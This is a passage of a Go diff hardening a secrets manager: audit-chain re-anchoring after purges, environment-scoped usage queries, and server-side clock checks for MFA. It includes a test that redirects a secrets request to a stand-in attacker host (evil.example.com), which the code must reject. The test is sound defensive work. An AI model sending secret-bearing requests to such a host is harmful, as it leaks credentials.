+		BaseURL:        "https://api.example.com",
+		APIKey:         "test-key",
+		TimeoutSeconds: 30,
+		RetryAttempts:  3,
+		TLSVerify:      true,
+	}
+	client, err := NewHTTPClient(config)
+	require.NoError(t, err)
+
+	originalReq, err := http.NewRequest(http.MethodGet, "https://api.example.com/v1/secrets/foo", nil)
+	require.NoError(t, err)
+	redirectedReq, err := http.NewRequest(http.MethodGet, "https://api.example.com/v1/secrets/foo/canonical", nil)
+	require.NoError(t, err)
+
+	err = client.client.CheckRedirect(redirectedReq, []*http.Request{originalReq})
+	assert.NoError(t, err)
+}
+
+// TestHTTPClient_CheckRedirect_RejectsCrossHost documents the pre-existing
+// host-pinning behavior CheckRedirect already had, so a future change can't
+// silently regress it while touching the scheme check above.
+func TestHTTPClient_CheckRedirect_RejectsCrossHost(t *testing.T) {
+	config := &Config{
+		BaseURL:        "https://api.example.com",
+		APIKey:         "test-key",
+		TimeoutSeconds: 30,
+		RetryAttempts:  3,
+		TLSVerify:      true,
+	}
+	client, err := NewHTTPClient(config)
+	require.NoError(t, err)
+
+	originalReq, err := http.NewRequest(http.MethodGet, "https://api.example.com/v1/secrets/foo", nil)
+	require.NoError(t, err)
+	crossHostReq, err := http.NewRequest(http.MethodGet, "https://evil.example.com/v1/secrets/foo", nil)
+	require.NoError(t, err)
+
+	err = client.client.CheckRedirect(crossHostReq, []*http.Request{originalReq})
+	assert.Error(t, err)
+	assert.Contains(t, err.Error(), "different host")
+}
+
 func TestHTTPClient_Get(t *testing.T) {
 	// Create a test server
 	server := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {

--- a/internal/storage/store/audit_retention_test.go
+++ b/internal/storage/store/audit_retention_test.go
@@ -77,9 +77,10 @@ func TestDeleteAuditLogsBefore_DeletesOldRows(t *testing.T) {
 		}).Error)
 	}
 
-	n, err := ls.DeleteAuditLogsBefore(ctx, cutoff)
+	n, anchor, err := ls.DeleteAuditLogsBefore(ctx, cutoff)
 	require.NoError(t, err)
 	assert.Equal(t, int64(3), n, "three old events deleted")
+	assert.Nil(t, anchor, "raw-inserted events have empty hashes (legacy/unchained) — nothing to re-anchor")
 
 	stats, err := ls.AuditRetentionStats(ctx)
 	require.NoError(t, err)
@@ -91,9 +92,10 @@ func TestDeleteAuditLogsBefore_EmptyTable(t *testing.T) {
 	ls := newAuditRetentionTestStore(t)
 	ctx := context.Background()
 
-	n, err := ls.DeleteAuditLogsBefore(ctx, time.Now().UTC())
+	n, anchor, err := ls.DeleteAuditLogsBefore(ctx, time.Now().UTC())
 	require.NoError(t, err)
 	assert.Equal(t, int64(0), n)
+	assert.Nil(t, anchor)
 }
 
 // TestDeleteAuditLogsBefore_NoneBeforeCutoff returns 0 when all events are newer.
@@ -109,9 +111,10 @@ func TestDeleteAuditLogsBefore_NoneBeforeCutoff(t *testing.T) {
 		}).Error)
 	}
 
-	n, err := ls.DeleteAuditLogsBefore(ctx, now.AddDate(0, 0, -30))
+	n, anchor, err := ls.DeleteAuditLogsBefore(ctx, now.AddDate(0, 0, -30))
 	require.NoError(t, err)
 	assert.Equal(t, int64(0), n, "no events old enough to delete")
+	assert.Nil(t, anchor)
 
 	stats, err := ls.AuditRetentionStats(ctx)
 	require.NoError(t, err)

--- a/internal/storage/store/concurrency_audit_chain_test.go
+++ b/internal/storage/store/concurrency_audit_chain_test.go
@@ -78,7 +78,7 @@ func TestConcurrency_AuditChain_StaysWellFormed(t *testing.T) {
 	}
 
 	// The chain must verify as a single unbroken line of exactly N events.
-	v, err := ls.VerifyAuditChain(context.Background())
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
 	require.NoError(t, err)
 	assert.True(t, v.Valid, "chain must stay valid under concurrent appends")
 	assert.Nil(t, v.FirstBrokenID, "no event may break the chain")

--- a/internal/storage/store/concurrency_purge_restore_race_test.go
+++ b/internal/storage/store/concurrency_purge_restore_race_test.go
@@ -159,7 +159,7 @@ func TestConcurrency_PurgeDeletedUsersBefore_RestoreWinsRace(t *testing.T) {
 func TestConcurrency_PurgeDeletedProjectsBefore_RestoreWinsRace(t *testing.T) {
 	db, err := gorm.Open(sqlite.Open(":memory:"), &gorm.Config{})
 	require.NoError(t, err)
-	require.NoError(t, db.AutoMigrate(&models.Project{}, &models.UserRole{}, &models.GroupRole{}))
+	require.NoError(t, db.AutoMigrate(&models.Project{}, &models.UserRole{}, &models.Group{}, &models.GroupRole{}))
 	ls := NewLocalStorage(db)
 	ctx := context.Background()
 

--- a/internal/storage/store/local_audit.go
+++ b/internal/storage/store/local_audit.go
@@ -186,8 +186,12 @@ func (s *scanTime) parse(str string) error {
 
 // MostAccessedSecrets ranks secrets by read count in the window, joining
 // secret_nodes for the name/environment. Reads are the usage signal, so only
-// access logs with action="read" are counted.
-func (ls *LocalStorage) MostAccessedSecrets(ctx context.Context, projectID *uint, since time.Time, limit int) ([]storage.SecretUsageStat, error) {
+// access logs with action="read" are counted. When environmentID is non-nil
+// the result is further confined to that single environment within the
+// project — matching the {project, environment} scope the HTTP route
+// authorizes against (ScopeFromQuery), so a caller authorized for only one
+// environment cannot receive the whole project's aggregate usage data.
+func (ls *LocalStorage) MostAccessedSecrets(ctx context.Context, projectID, environmentID *uint, since time.Time, limit int) ([]storage.SecretUsageStat, error) {
 	if limit <= 0 {
 		limit = 10
 	}
@@ -204,6 +208,9 @@ func (ls *LocalStorage) MostAccessedSecrets(ctx context.Context, projectID *uint
 		Limit(limit)
 	if projectID != nil {
 		q = q.Where("s.project_id = ?", *projectID)
+	}
+	if environmentID != nil {
+		q = q.Where("s.environment_id = ?", *environmentID)
 	}
 
 	type row struct {
@@ -230,8 +237,13 @@ func (ls *LocalStorage) MostAccessedSecrets(ctx context.Context, projectID *uint
 
 // UnusedSecrets returns secrets whose most recent read is older than
 // notReadSince (or that have never been read), ordered never-read first. Only
-// real secrets (is_secret) are considered, not folder nodes.
-func (ls *LocalStorage) UnusedSecrets(ctx context.Context, projectID *uint, notReadSince time.Time) ([]storage.UnusedSecretStat, error) {
+// real secrets (is_secret) are considered, not folder nodes. When
+// environmentID is non-nil the result is further confined to that single
+// environment within the project — matching the {project, environment} scope
+// the HTTP route authorizes against (ScopeFromQuery), so a caller authorized
+// for only one environment cannot receive the whole project's aggregate
+// usage data.
+func (ls *LocalStorage) UnusedSecrets(ctx context.Context, projectID, environmentID *uint, notReadSince time.Time) ([]storage.UnusedSecretStat, error) {
 	q := ls.db.WithContext(ctx).
 		Table("secret_nodes AS s").
 		Select("s.id AS secret_id, s.name AS secret_name, s.environment_id AS environment_id, MAX(l.access_time) AS last_read").
@@ -244,6 +256,9 @@ func (ls *LocalStorage) UnusedSecrets(ctx context.Context, projectID *uint, notR
 		Limit(maxUnboundedListRows)
 	if projectID != nil {
 		q = q.Where("s.project_id = ?", *projectID)
+	}
+	if environmentID != nil {
+		q = q.Where("s.environment_id = ?", *environmentID)
 	}
 
 	type row struct {

--- a/internal/storage/store/local_audit.go
+++ b/internal/storage/store/local_audit.go
@@ -326,12 +326,53 @@ func (ls *LocalStorage) CountUnusedSecretsByProject(ctx context.Context, project
 }
 
 // DeleteAuditLogsBefore hard-deletes all AuditEvent rows whose event_time is
-// before cutoff. It returns the number of rows deleted.
-func (ls *LocalStorage) DeleteAuditLogsBefore(ctx context.Context, cutoff time.Time) (int64, error) {
+// before cutoff. It returns the number of rows deleted, plus a re-anchor
+// candidate (storage.AuditChainAnchor) when the delete reached into the
+// chained (post-ADR-029) hash-chain region rather than just the pre-ADR-029
+// unchained legacy prefix: the new earliest surviving row's own
+// id/prev_hash/entry_hash. That row's prev_hash still points at its
+// now-deleted predecessor — without authenticating and persisting this as a
+// retention anchor, VerifyAuditChain can never again walk past this row (see
+// the ADR-029 retention-purge finding this closes). The caller
+// (core.PurgeAuditLogs) is responsible for HMAC-signing and persisting it,
+// inside the same transaction as this delete, via SetSystemMetadata.
+//
+// candidate is nil when nothing was deleted, the table is now empty, or the
+// new earliest surviving row already legitimately starts at genesis (the
+// purge only removed the unchained legacy prefix) — nothing to re-anchor.
+func (ls *LocalStorage) DeleteAuditLogsBefore(ctx context.Context, cutoff time.Time) (int64, *storage.AuditChainAnchor, error) {
 	result := ls.db.WithContext(ctx).
 		Where("event_time < ?", cutoff).
 		Delete(&models.AuditEvent{})
-	return result.RowsAffected, result.Error
+	if result.Error != nil || result.RowsAffected == 0 {
+		return result.RowsAffected, nil, result.Error
+	}
+
+	var head struct {
+		ID        uint
+		PrevHash  string
+		EntryHash string
+	}
+	if err := ls.db.WithContext(ctx).
+		Model(&models.AuditEvent{}).
+		Select("id, prev_hash, entry_hash").
+		Order("id ASC").
+		Limit(1).
+		Scan(&head).Error; err != nil {
+		return result.RowsAffected, nil, err
+	}
+	if head.ID == 0 || head.PrevHash == "" || head.PrevHash == auditGenesisHash {
+		// Table now empty, or the surviving prefix already legitimately starts at
+		// genesis (the purge only removed pre-ADR-029 legacy/unchained rows, or
+		// the next append will restart the chain from genesis) — no re-anchor
+		// needed; VerifyAuditChain's normal genesis walk already handles this.
+		return result.RowsAffected, nil, nil
+	}
+	return result.RowsAffected, &storage.AuditChainAnchor{
+		RowID:     head.ID,
+		PrevHash:  head.PrevHash,
+		EntryHash: head.EntryHash,
+	}, nil
 }
 
 // AuditRetentionStats returns the total audit event count plus the oldest and

--- a/internal/storage/store/local_audit_chain.go
+++ b/internal/storage/store/local_audit_chain.go
@@ -139,13 +139,23 @@ func (ls *LocalStorage) LogAuditEvent(ctx context.Context, event *models.AuditEv
 // unchained prefix. From the first chained row, each row's prev_hash must equal
 // the running previous entry_hash (genesis for the first) and its entry_hash
 // must recompute from its stored fields. The first divergence stops the walk.
-func (ls *LocalStorage) VerifyAuditChain(ctx context.Context) (*storage.AuditChainVerification, error) {
+//
+// anchor, when non-nil, is an ALREADY-AUTHENTICATED re-anchor point (see
+// storage.AuditChainAnchor) written by a retention purge that removed the
+// original earliest rows. This method trusts it literally — it does not, and
+// cannot, re-verify its signature (no signing key at this layer); the caller
+// must have done that. When the earliest surviving row's own prev_hash is
+// still genesis (the purge only removed the unchained legacy prefix, emptied
+// the table, or no purge ever ran), the anchor is superfluous and ignored —
+// the walk proceeds exactly as it always has.
+func (ls *LocalStorage) VerifyAuditChain(ctx context.Context, anchor *storage.AuditChainAnchor) (*storage.AuditChainVerification, error) {
 	result := &storage.AuditChainVerification{Valid: true}
 
 	prevHash := auditGenesisHash
 	started := false
 	var lastID uint
 	var headID uint
+	firstBatch := true
 
 	for {
 		var batch []*models.AuditEvent
@@ -158,6 +168,22 @@ func (ls *LocalStorage) VerifyAuditChain(ctx context.Context) (*storage.AuditCha
 		}
 		if len(batch) == 0 {
 			break
+		}
+		if firstBatch {
+			firstBatch = false
+			if head := batch[0]; anchor != nil && head.PrevHash != auditGenesisHash {
+				if head.EntryHash == "" || head.ID != anchor.RowID ||
+					head.PrevHash != anchor.PrevHash || head.EntryHash != anchor.EntryHash {
+					brokenChain(result, head.ID,
+						"earliest surviving audit row does not match the last retention re-anchor (rows removed outside a sanctioned purge, or the re-anchor is stale)")
+					return result, nil
+				}
+				// The anchor authenticates head's prev_hash as a legitimate chain
+				// position established before its predecessors were purged — seed
+				// the walk from there instead of requiring genesis.
+				prevHash = anchor.PrevHash
+				started = true
+			}
 		}
 		newPrev, newHead, newStarted, broke := verifyBatchEvents(batch, prevHash, started, result)
 		if broke {

--- a/internal/storage/store/local_audit_chain_test.go
+++ b/internal/storage/store/local_audit_chain_test.go
@@ -49,7 +49,7 @@ func TestLogAuditEvent_BuildsChain(t *testing.T) {
 	assert.Equal(t, e2.EntryHash, e3.PrevHash)
 	assert.NotEqual(t, e1.EntryHash, e2.EntryHash)
 
-	v, err := ls.VerifyAuditChain(context.Background())
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
 	require.NoError(t, err)
 	assert.True(t, v.Valid)
 	assert.Equal(t, int64(3), v.ChainedEvents)
@@ -68,7 +68,7 @@ func TestVerifyAuditChain_HeadAnchorDetectsTruncation(t *testing.T) {
 	appendEvent(t, ls, "secret.read", "second", base.Add(time.Second))
 	e3 := appendEvent(t, ls, "secret.updated", "third", base.Add(2*time.Second))
 
-	v, err := ls.VerifyAuditChain(context.Background())
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
 	require.NoError(t, err)
 	require.True(t, v.Valid)
 	assert.Equal(t, int64(3), v.ChainedEvents)
@@ -77,7 +77,7 @@ func TestVerifyAuditChain_HeadAnchorDetectsTruncation(t *testing.T) {
 
 	// A DB-writer truncates the tail. On-box verify still passes…
 	require.NoError(t, ls.db.Where("id = ?", e3.ID).Delete(&models.AuditEvent{}).Error)
-	v2, err := ls.VerifyAuditChain(context.Background())
+	v2, err := ls.VerifyAuditChain(context.Background(), nil)
 	require.NoError(t, err)
 	assert.True(t, v2.Valid, "truncated chain stays internally consistent (the documented limitation)")
 	// …but the recorded anchor moved — the count dropped and the head changed.
@@ -97,7 +97,7 @@ func TestVerifyAuditChain_DetectsModification(t *testing.T) {
 		Where("id = ?", e2.ID).
 		Update("description", "TAMPERED").Error)
 
-	v, err := ls.VerifyAuditChain(context.Background())
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
 	require.NoError(t, err)
 	assert.False(t, v.Valid)
 	require.NotNil(t, v.FirstBrokenID)
@@ -117,7 +117,7 @@ func TestVerifyAuditChain_DetectsDeletion(t *testing.T) {
 	// Delete a middle event; e3's prev_hash now links to a vanished entry.
 	require.NoError(t, ls.db.Delete(&models.AuditEvent{}, e2.ID).Error)
 
-	v, err := ls.VerifyAuditChain(context.Background())
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
 	require.NoError(t, err)
 	assert.False(t, v.Valid)
 	require.NotNil(t, v.FirstBrokenID)
@@ -142,7 +142,7 @@ func TestVerifyAuditChain_LegacyPrefix(t *testing.T) {
 	appendEvent(t, ls, "auth.login", "chained-1", base.Add(10*time.Second))
 	appendEvent(t, ls, "secret.read", "chained-2", base.Add(11*time.Second))
 
-	v, err := ls.VerifyAuditChain(context.Background())
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
 	require.NoError(t, err)
 	assert.True(t, v.Valid)
 	assert.Equal(t, int64(2), v.UnchainedEvents, "legacy rows counted, not failed")
@@ -151,7 +151,7 @@ func TestVerifyAuditChain_LegacyPrefix(t *testing.T) {
 
 func TestVerifyAuditChain_Empty(t *testing.T) {
 	ls := newAuditChainTestStore(t)
-	v, err := ls.VerifyAuditChain(context.Background())
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
 	require.NoError(t, err)
 	assert.True(t, v.Valid)
 	assert.Equal(t, int64(0), v.ChainedEvents)
@@ -183,7 +183,7 @@ func TestLogAuditEvent_ConcurrentAppendsStayChained(t *testing.T) {
 	}
 	wg.Wait()
 
-	v, err := ls.VerifyAuditChain(context.Background())
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
 	require.NoError(t, err)
 	assert.True(t, v.Valid, "chain intact under concurrent writers: %s", v.Reason)
 	assert.Equal(t, int64(writers*perWriter), v.ChainedEvents)
@@ -216,7 +216,7 @@ func TestLogAuditEvent_EmptyActorTypeStillVerifies(t *testing.T) {
 	require.NoError(t, ls.db.First(&stored, shareEvt.ID).Error)
 	assert.Equal(t, "user", stored.ActorType)
 
-	v, err := ls.VerifyAuditChain(context.Background())
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
 	require.NoError(t, err)
 	assert.True(t, v.Valid, "chain with an empty-ActorType event must verify: %s", v.Reason)
 	assert.Equal(t, int64(2), v.ChainedEvents)
@@ -248,7 +248,7 @@ func TestLogAuditEvent_NilSuccessStillVerifies(t *testing.T) {
 	require.NotNil(t, stored.Success)
 	assert.True(t, *stored.Success)
 
-	v, err := ls.VerifyAuditChain(context.Background())
+	v, err := ls.VerifyAuditChain(context.Background(), nil)
 	require.NoError(t, err)
 	assert.True(t, v.Valid, "chain with a nil-Success event must verify: %s", v.Reason)
 	assert.Equal(t, int64(2), v.ChainedEvents)

--- a/internal/storage/store/local_rbac.go
+++ b/internal/storage/store/local_rbac.go
@@ -322,7 +322,13 @@ func (ls *LocalStorage) ListProjectRoleAssignments(ctx context.Context, projectI
 	}
 
 	var groupRows []models.GroupRole
-	if err := ls.db.WithContext(ctx).
+	if err := ls.db.WithContext(ctx).Table("group_roles").
+		Select("group_roles.*").
+		// A soft-deleted group confers no roles/authority — exclude its grant rows,
+		// matching GetUserGroupRoleIDsAt's authorization resolution. Without this a
+		// deleted group's still-present group_roles row kept showing up as a "live"
+		// project-admin assignment to callers like guardLastProjectAdmin.
+		Joins(sqlJoinGroups).
 		Where(sqlWhereProjectID, projectID).
 		Where(sqlWhereGRNotExpired, now).
 		Find(&groupRows).Error; err != nil {

--- a/internal/storage/store/local_sharing_test.go
+++ b/internal/storage/store/local_sharing_test.go
@@ -235,7 +235,7 @@ func TestDeleteProject_RevokesActiveSharesForProjectSecrets(t *testing.T) {
 // (PurgeDeletedProjectsBefore, see TestPurgeDeletedProjectsBefore_CascadesRoleGrants).
 func TestDeleteProject_LeavesRoleGrantsUntouched(t *testing.T) {
 	db := sharingConcurrentDB(t)
-	require.NoError(t, db.AutoMigrate(&models.Project{}, &models.Environment{}, &models.UserRole{}, &models.GroupRole{}, &models.DynamicSecretConfig{}))
+	require.NoError(t, db.AutoMigrate(&models.Project{}, &models.Environment{}, &models.UserRole{}, &models.Group{}, &models.GroupRole{}, &models.DynamicSecretConfig{}))
 	ls := NewLocalStorage(db)
 	ctx := context.Background()
 

--- a/internal/storage/store/remote_audit.go
+++ b/internal/storage/store/remote_audit.go
@@ -166,12 +166,12 @@ func (rs *RemoteStorage) AuditRetentionStats(_ context.Context) (*storage.AuditR
 }
 
 // DeleteAuditLogsBefore is not available in remote mode; audit purge runs server-side.
-func (rs *RemoteStorage) DeleteAuditLogsBefore(_ context.Context, _ time.Time) (int64, error) {
-	return 0, fmt.Errorf("DeleteAuditLogsBefore not available in remote mode")
+func (rs *RemoteStorage) DeleteAuditLogsBefore(_ context.Context, _ time.Time) (int64, *storage.AuditChainAnchor, error) {
+	return 0, nil, fmt.Errorf("DeleteAuditLogsBefore not available in remote mode")
 }
 
 // VerifyAuditChain is not available in remote mode; chain verification runs server-side.
-func (rs *RemoteStorage) VerifyAuditChain(_ context.Context) (*storage.AuditChainVerification, error) {
+func (rs *RemoteStorage) VerifyAuditChain(_ context.Context, _ *storage.AuditChainAnchor) (*storage.AuditChainVerification, error) {
 	return nil, fmt.Errorf("VerifyAuditChain not available in remote mode")
 }
 

--- a/internal/storage/store/remote_audit.go
+++ b/internal/storage/store/remote_audit.go
@@ -145,12 +145,12 @@ func (rs *RemoteStorage) PrincipalSecretFirstSeen(_ context.Context, _ time.Time
 }
 
 // MostAccessedSecrets is not available in remote mode; usage analytics aggregate server-side.
-func (rs *RemoteStorage) MostAccessedSecrets(_ context.Context, _ *uint, _ time.Time, _ int) ([]storage.SecretUsageStat, error) {
+func (rs *RemoteStorage) MostAccessedSecrets(_ context.Context, _, _ *uint, _ time.Time, _ int) ([]storage.SecretUsageStat, error) {
 	return nil, fmt.Errorf("MostAccessedSecrets not available in remote mode")
 }
 
 // UnusedSecrets is not available in remote mode; usage analytics aggregate server-side.
-func (rs *RemoteStorage) UnusedSecrets(_ context.Context, _ *uint, _ time.Time) ([]storage.UnusedSecretStat, error) {
+func (rs *RemoteStorage) UnusedSecrets(_ context.Context, _, _ *uint, _ time.Time) ([]storage.UnusedSecretStat, error) {
 	return nil, fmt.Errorf("UnusedSecrets not available in remote mode")
 }
 

--- a/internal/storage/store/remote_audit_test.go
+++ b/internal/storage/store/remote_audit_test.go
@@ -246,7 +246,7 @@ func TestRemoteStorage_VerifyAuditChain_Unsupported(t *testing.T) {
 	rs, err := store.NewRemoteStorage(testConfig("http://127.0.0.1:0"))
 	require.NoError(t, err)
 
-	_, err = rs.VerifyAuditChain(context.Background())
+	_, err = rs.VerifyAuditChain(context.Background(), nil)
 	assert.Error(t, err)
 	assert.Contains(t, err.Error(), "not available in remote mode")
 }
@@ -390,8 +390,9 @@ func TestRemoteStorage_DeleteAuditLogsBefore_Unsupported(t *testing.T) {
 	rs, err := store.NewRemoteStorage(testConfig("http://127.0.0.1:0"))
 	require.NoError(t, err)
 
-	n, err := rs.DeleteAuditLogsBefore(context.Background(), time.Now())
+	n, anchor, err := rs.DeleteAuditLogsBefore(context.Background(), time.Now())
 	assert.Error(t, err)
 	assert.Equal(t, int64(0), n)
+	assert.Nil(t, anchor)
 	assert.Contains(t, err.Error(), "not available in remote mode")
 }

--- a/internal/storage/store/remote_audit_test.go
+++ b/internal/storage/store/remote_audit_test.go
@@ -202,7 +202,7 @@ func TestRemoteStorage_MostAccessedSecrets_Unsupported(t *testing.T) {
 	rs, err := store.NewRemoteStorage(testConfig("http://127.0.0.1:0"))
 	require.NoError(t, err)
 
-	_, err = rs.MostAccessedSecrets(context.Background(), nil, time.Now(), 10)
+	_, err = rs.MostAccessedSecrets(context.Background(), nil, nil, time.Now(), 10)
 	assert.Error(t, err)
 	assert.Contains(t, err.Error(), "not available in remote mode")
 }
@@ -213,7 +213,7 @@ func TestRemoteStorage_UnusedSecrets_Unsupported(t *testing.T) {
 	rs, err := store.NewRemoteStorage(testConfig("http://127.0.0.1:0"))
 	require.NoError(t, err)
 
-	_, err = rs.UnusedSecrets(context.Background(), nil, time.Now())
+	_, err = rs.UnusedSecrets(context.Background(), nil, nil, time.Now())
 	assert.Error(t, err)
 	assert.Contains(t, err.Error(), "not available in remote mode")
 }

--- a/internal/storage/store/remote_mfa.go
+++ b/internal/storage/store/remote_mfa.go
@@ -360,12 +360,16 @@ func decodeMFAChallengeResponse(data []byte) (*models.MFAChallenge, error) {
 }
 
 // mfaChallengeLookupWire is the wire body shared by GetActiveMFAChallenge and
-// ConsumeMFAChallenge below — both take the identical (tokenHash, now) pair
-// internal/core/webauthn.go already passes to storage.Storage's local
-// implementation (local_mfa.go).
+// ConsumeMFAChallenge below. It no longer carries `now` on the wire
+// (G-wave6): the upstream server computes the expiry-comparison time itself
+// from its own clock rather than trusting a value a caller could manipulate
+// to keep an expired challenge usable or force a live one to look expired —
+// see server/http/handlers/users_crud.go's mfaChallengeLookupBody doc
+// comment. The `now` parameter below is kept on RemoteStorage's methods only
+// for interface parity with LocalStorage (internal/core/storage.Storage);
+// it is intentionally not sent.
 type mfaChallengeLookupWire struct {
-	TokenHash string    `json:"token_hash"`
-	Now       time.Time `json:"now"`
+	TokenHash string `json:"token_hash"`
 }
 
 // ConsumeMFAChallenge atomically marks a valid (unused, unexpired) challenge used
@@ -382,10 +386,12 @@ type mfaChallengeLookupWire struct {
 // close. This is an ordinary storage passthrough, NOT part of the
 // RemoteMFAVerifier proxy above — see the package doc for why that split is
 // correct here (the challenge row carries no secret of its own).
-func (rs *RemoteStorage) ConsumeMFAChallenge(ctx context.Context, tokenHash string, now time.Time) (*models.MFAChallenge, error) {
+// now is accepted only for interface parity with LocalStorage — the
+// upstream server ignores any caller-supplied "current time" and always
+// uses its own clock (see mfaChallengeLookupWire's doc comment).
+func (rs *RemoteStorage) ConsumeMFAChallenge(ctx context.Context, tokenHash string, _ time.Time) (*models.MFAChallenge, error) {
 	resp, err := rs.client.Post(ctx, "/api/v1/users/mfa-challenge/consume", mfaChallengeLookupWire{
 		TokenHash: tokenHash,
-		Now:       now,
 	})
 	if err != nil {
 		return nil, fmt.Errorf("invalid or expired challenge")
@@ -404,10 +410,12 @@ func (rs *RemoteStorage) ConsumeMFAChallenge(ctx context.Context, tokenHash stri
 // ConsumeMFAChallenge above (called from FinishWebAuthnLogin) is what actually
 // spends it, matching local_mfa.go's own GetActiveMFAChallenge/
 // ConsumeMFAChallenge split exactly.
-func (rs *RemoteStorage) GetActiveMFAChallenge(ctx context.Context, tokenHash string, now time.Time) (*models.MFAChallenge, error) {
+// now is accepted only for interface parity with LocalStorage — the
+// upstream server ignores any caller-supplied "current time" and always
+// uses its own clock (see mfaChallengeLookupWire's doc comment).
+func (rs *RemoteStorage) GetActiveMFAChallenge(ctx context.Context, tokenHash string, _ time.Time) (*models.MFAChallenge, error) {
 	resp, err := rs.client.Post(ctx, "/api/v1/users/mfa-challenge/active", mfaChallengeLookupWire{
 		TokenHash: tokenHash,
-		Now:       now,
 	})
 	if err != nil {
 		return nil, fmt.Errorf("invalid or expired challenge")

--- a/internal/storage/store/remote_mfa_stepup_grant.go
+++ b/internal/storage/store/remote_mfa_stepup_grant.go
@@ -48,9 +48,12 @@ func decodeMFAStepUpGrantResponse(data []byte) (*models.MFAStepUpGrant, error) {
 }
 
 // mfaStepUpGrantActiveWire is the request body for GetActiveMFAStepUpGrant.
+// It no longer carries `now` on the wire (G-wave6, same fix as
+// remote_mfa.go's mfaChallengeLookupWire): the upstream server always uses
+// its own clock for the expiry comparison instead of trusting a
+// caller-supplied value.
 type mfaStepUpGrantActiveWire struct {
-	UserID uint      `json:"user_id"`
-	Now    time.Time `json:"now"`
+	UserID uint `json:"user_id"`
 }
 
 // CreateMFAStepUpGrant persists a new MFA step-up grant via
@@ -75,10 +78,12 @@ func (rs *RemoteStorage) CreateMFAStepUpGrant(ctx context.Context, grant *models
 // GetActiveMFAStepUpGrant returns the most recent non-expired MFA step-up
 // grant for userID via POST /api/v1/system/mfa/stepup-grants/active.
 // Returns (nil, nil) when the server returns null data (no active grant).
-func (rs *RemoteStorage) GetActiveMFAStepUpGrant(ctx context.Context, userID uint, now time.Time) (*models.MFAStepUpGrant, error) {
+// now is accepted only for interface parity with LocalStorage — the
+// upstream server ignores any caller-supplied "current time" and always
+// uses its own clock (see mfaStepUpGrantActiveWire's doc comment).
+func (rs *RemoteStorage) GetActiveMFAStepUpGrant(ctx context.Context, userID uint, _ time.Time) (*models.MFAStepUpGrant, error) {
 	resp, err := rs.client.Post(ctx, "/api/v1/system/mfa/stepup-grants/active", mfaStepUpGrantActiveWire{
 		UserID: userID,
-		Now:    now,
 	})
 	if err != nil {
 		return nil, fmt.Errorf("failed to get active MFA step-up grant: %w", err)

--- a/internal/storage/store/remote_webauthn.go
+++ b/internal/storage/store/remote_webauthn.go
@@ -381,9 +381,12 @@ func (rs *RemoteStorage) CreateWebAuthnSession(ctx context.Context, s *models.We
 }
 
 // webAuthnSessionConsumeWire is the wire body for ConsumeWebAuthnSessionProxy.
+// It no longer carries `now` on the wire (G-wave6, same fix as
+// remote_mfa.go's mfaChallengeLookupWire): the upstream server always uses
+// its own clock for the expiry comparison instead of trusting a
+// caller-supplied value.
 type webAuthnSessionConsumeWire struct {
-	TokenHash string    `json:"token_hash"`
-	Now       time.Time `json:"now"`
+	TokenHash string `json:"token_hash"`
 }
 
 // ConsumeWebAuthnSession atomically marks a valid (unused, unexpired) ceremony
@@ -398,10 +401,12 @@ type webAuthnSessionConsumeWire struct {
 // the caller (internal/core.FinishWebAuthnRegistration/FinishWebAuthnLogin) already
 // treats any error here as "invalid or expired registration/login session"
 // regardless of cause.
-func (rs *RemoteStorage) ConsumeWebAuthnSession(ctx context.Context, tokenHash string, now time.Time) (*models.WebAuthnSession, error) {
+// now is accepted only for interface parity with LocalStorage — the
+// upstream server ignores any caller-supplied "current time" and always
+// uses its own clock (see webAuthnSessionConsumeWire's doc comment).
+func (rs *RemoteStorage) ConsumeWebAuthnSession(ctx context.Context, tokenHash string, _ time.Time) (*models.WebAuthnSession, error) {
 	resp, err := rs.client.Post(ctx, "/api/v1/system/webauthn/sessions/consume", webAuthnSessionConsumeWire{
 		TokenHash: tokenHash,
-		Now:       now,
 	})
 	if err != nil {
 		return nil, fmt.Errorf("invalid or expired webauthn session")

--- a/internal/storage/store/store_coverage_gaps_test.go
+++ b/internal/storage/store/store_coverage_gaps_test.go
@@ -213,7 +213,7 @@ func TestMostAccessedSecrets_NilProjectID(t *testing.T) {
 	ls := NewLocalStorage(db)
 	ctx := context.Background()
 
-	result, err := ls.MostAccessedSecrets(ctx, nil, time.Now().Add(-time.Hour), 10)
+	result, err := ls.MostAccessedSecrets(ctx, nil, nil, time.Now().Add(-time.Hour), 10)
 	require.NoError(t, err)
 	assert.Empty(t, result)
 }
@@ -228,7 +228,7 @@ func TestMostAccessedSecrets_ZeroLimit(t *testing.T) {
 	ctx := context.Background()
 
 	pid := uint(1)
-	result, err := ls.MostAccessedSecrets(ctx, &pid, time.Now().Add(-time.Hour), 0)
+	result, err := ls.MostAccessedSecrets(ctx, &pid, nil, time.Now().Add(-time.Hour), 0)
 	require.NoError(t, err)
 	assert.Empty(t, result)
 }
@@ -245,7 +245,7 @@ func TestUnusedSecrets_NilProjectID(t *testing.T) {
 	ls := NewLocalStorage(db)
 	ctx := context.Background()
 
-	result, err := ls.UnusedSecrets(ctx, nil, time.Now())
+	result, err := ls.UnusedSecrets(ctx, nil, nil, time.Now())
 	require.NoError(t, err)
 	assert.Empty(t, result)
 }
@@ -390,7 +390,7 @@ func TestAuditRetentionStats_BrokenDB(t *testing.T) {
 func TestMostAccessedSecrets_BrokenDB(t *testing.T) {
 	ls := newBrokenDB(t)
 	pid := uint(1)
-	_, err := ls.MostAccessedSecrets(context.Background(), &pid, time.Now().Add(-time.Hour), 10)
+	_, err := ls.MostAccessedSecrets(context.Background(), &pid, nil, time.Now().Add(-time.Hour), 10)
 	require.Error(t, err)
 }
 
@@ -398,7 +398,7 @@ func TestMostAccessedSecrets_BrokenDB(t *testing.T) {
 func TestUnusedSecrets_BrokenDB(t *testing.T) {
 	ls := newBrokenDB(t)
 	pid := uint(1)
-	_, err := ls.UnusedSecrets(context.Background(), &pid, time.Now())
+	_, err := ls.UnusedSecrets(context.Background(), &pid, nil, time.Now())
 	require.Error(t, err)
 }
 

--- a/internal/storage/store/store_max_test.go
+++ b/internal/storage/store/store_max_test.go
